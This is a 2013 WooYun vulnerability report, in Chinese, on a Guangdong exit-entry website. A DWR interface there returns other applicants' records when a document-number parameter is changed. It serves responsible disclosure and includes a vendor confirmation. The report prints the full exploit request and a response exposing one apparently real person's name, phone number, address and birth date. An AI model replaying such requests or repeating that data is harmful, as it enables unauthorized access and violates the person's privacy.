漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-020589
漏洞标题:广东出入境网站某接口泄露用户信息
相关厂商:广东出入境
漏洞作者: fbi007130
提交时间:2013-03-24 22:50
修复时间:2013-05-08 22:51
公开时间:2013-05-08 22:51
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-03-24: 细节已通知厂商并且等待厂商处理中
2013-03-25: 厂商已经确认,细节仅向厂商公开
2013-04-04: 细节向核心白帽子及相关领域专家公开
2013-04-14: 细节向普通白帽子公开
2013-04-24: 细节向实习白帽子公开
2013-05-08: 细节向公众公开
简要描述:
使用某业务的时候多手去用fiddler看了一下包,竟然发现仅凭着一个可以推导的要素就可以获取到公民姓名、出生年月以及证件相关信息
广东的孩子也kb,2个月才能签一次澳门签注(顺带说说,不是bug)
另外,乌云的编辑窗口,在chrome里边不能拉大。。。。
详细说明:
调用接口,修改c0-param0即可获取用户资料
漏洞证明:
request:
POST http://gdcrj.com/wsyw/dwr/call/plaincall/ApplyLookup.findOldApply.dwr HTTP/1.1
Host: gdcrj.com
Connection: keep-alive
Content-Length: 286
Origin: http://gdcrj.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.56 Safari/537.17
Content-Type: text/plain
Accept: */*
Referer: http://gdcrj.com/wsyw/tbpassportapply/tbpassportapply.do?method=grly
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECD92A89A0664E72071AA427916BB7A4
callCount=1
page=/wsyw/tbpassportapply/tbpassportapply.do?method=grly
httpSessionId=ECD92A89A0664E72071AA427916BB7A4
scriptSessionId=72C84F2F080B22B562A7B5981EFCCD6868
c0-scriptName=ApplyLookup
c0-methodName=findOldApply
c0-id=0
c0-param0=string:W28615021
c0-param1=string:08
batchId=0
response:
HTTP/1.1 200 OK
Date: Sun, 24 Mar 2013 12:27:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/javascript
Content-Length: 290
Connection: Keep-alive
Keep-Alive: timeout=15, max=100
Via: 1.1 ID-0002262016313030 uproxy-2
//#DWR-INSERT
//#DWR-REPLY
dwr.engine._remoteHandleCallback('0','0',{'XM_X':"\u6C64",GZDW:"\u65E0",DWDH:"13630035576",emssjr:"\u6C64\u5FD7\u948A",ZJYXQZ:"2013-11-23",emsaddr:"\u5357\u6D77 \u91CC\u6C34(13630035576)",applyflag:"1",'XM_M':"\u5FD7\u948A",emsyb:"528200",CSRQ:"1986-10-01"});
修复方案:
用那么贵的签注费去补补服务器吧。。。。别把敏感信息在前端检校了。。。。
版权声明:转载请注明来源 fbi007130@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2013-03-25 10:10
厂商回复:
经检测,DWR应用中权限设置有问题,用户在办理证件速递业务时,抓取到DWR调用接口后,能够获得其他用户的一些信息。
最新状态:
暂无